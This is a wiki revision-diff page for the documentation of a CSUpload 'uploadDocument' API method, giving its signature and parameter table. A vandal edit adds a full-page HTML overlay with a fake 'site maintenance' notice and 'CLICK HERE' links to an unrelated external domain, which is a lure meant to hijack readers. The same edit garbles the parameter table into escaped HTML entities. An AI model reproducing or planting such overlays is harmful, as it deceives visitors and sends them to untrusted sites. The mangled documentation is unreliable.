Difference between revisions of "CSUpload 1 0-uploadDocument"

From ADF Docs
Jump to: navigation, search
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://uxegyjyga.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://uxegyjyga.co.cc CLICK HERE]=
 +
----
 +
</div>
 
__NOTOC__
 
__NOTOC__
 
Attention: Do not change any text in the description, signature, and paramter sections.
 
Attention: Do not change any text in the description, signature, and paramter sections.
Line 8: Line 16:
  
 
== Signature ==  
 
== Signature ==  
public struct <strong>uploadDocument</strong> ( numeric subsiteid, struct data, Binary docBinaryData, numeric doLogin )
+
public struct &lt;strong&gt;uploadDocument&lt;/strong&gt; ( numeric subsiteid, struct data, Binary docBinaryData, numeric doLogin )
  
 
== Parameters ==  
 
== Parameters ==  
  
<table id="lib-params">
+
&lt;table id=&quot;lib-params&quot;&gt;
<tr class="header">
+
&lt;tr class=&quot;header&quot;&gt;
<td>Required</td>
+
&lt;td&gt;Required&lt;/td&gt;
<td>Name</td>
+
&lt;td&gt;Name&lt;/td&gt;
<td>Type</td>
+
&lt;td&gt;Type&lt;/td&gt;
<td>Description</td>
+
&lt;td&gt;Description&lt;/td&gt;
</tr>
+
&lt;/tr&gt;
 
 
 
 
<tr>
+
&lt;tr&gt;
 
 
<td class="required">required</td>
+
&lt;td class=&quot;required&quot;&gt;required&lt;/td&gt;
 
 
<td>subsiteid</td>
+
&lt;td&gt;subsiteid&lt;/td&gt;
<td>numeric</td>
+
&lt;td&gt;numeric&lt;/td&gt;
<td></td>
+
&lt;td&gt;&lt;/td&gt;
</tr>
+
&lt;/tr&gt;
 
 
<tr>
+
&lt;tr&gt;
 
 
<td>&nbsp;</td>
+
&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 
 
<td>data</td>
+
&lt;td&gt;data&lt;/td&gt;
<td>struct</td>
+
&lt;td&gt;struct&lt;/td&gt;
<td>Data for upload document.</td>
+
&lt;td&gt;Data for upload document.&lt;/td&gt;
</tr>
+
&lt;/tr&gt;
 
 
<tr>
+
&lt;tr&gt;
 
 
<td>&nbsp;</td>
+
&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 
 
<td>docBinaryData</td>
+
&lt;td&gt;docBinaryData&lt;/td&gt;
<td>Binary</td>
+
&lt;td&gt;Binary&lt;/td&gt;
<td>Binary data of the document.</td>
+
&lt;td&gt;Binary data of the document.&lt;/td&gt;
</tr>
+
&lt;/tr&gt;
 
 
<tr>
+
&lt;tr&gt;
 
 
<td class="required">optional</td>
+
&lt;td class=&quot;required&quot;&gt;optional&lt;/td&gt;
 
 
<td>doLogin</td>
+
&lt;td&gt;doLogin&lt;/td&gt;
<td>numeric</td>
+
&lt;td&gt;numeric&lt;/td&gt;
<td>[Default: 0] Force the login always</td>
+
&lt;td&gt;[Default: 0] Force the login always&lt;/td&gt;
</tr>
+
&lt;/tr&gt;
 
 
</table>
+
&lt;/table&gt;

Revision as of 23:14, 23 November 2010



Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page


CLICK HERE


Attention: Do not change any text in the description, signature, and paramter sections.

Return to CSUpload_1_0

Description

Use this method to upload a document into the upload folder of an designated subsite

Signature

public struct <strong>uploadDocument</strong> ( numeric subsiteid, struct data, Binary docBinaryData, numeric doLogin )

Parameters

<table id="lib-params"> <tr class="header"> <td>Required</td> <td>Name</td> <td>Type</td> <td>Description</td> </tr>


<tr>

<td class="required">required</td>

<td>subsiteid</td> <td>numeric</td> <td></td> </tr>

<tr>

<td>&nbsp;</td>

<td>data</td> <td>struct</td> <td>Data for upload document.</td> </tr>

<tr>

<td>&nbsp;</td>

<td>docBinaryData</td> <td>Binary</td> <td>Binary data of the document.</td> </tr>

<tr>

<td class="required">optional</td>

<td>doLogin</td> <td>numeric</td> <td>[Default: 0] Force the login always</td> </tr>

</table>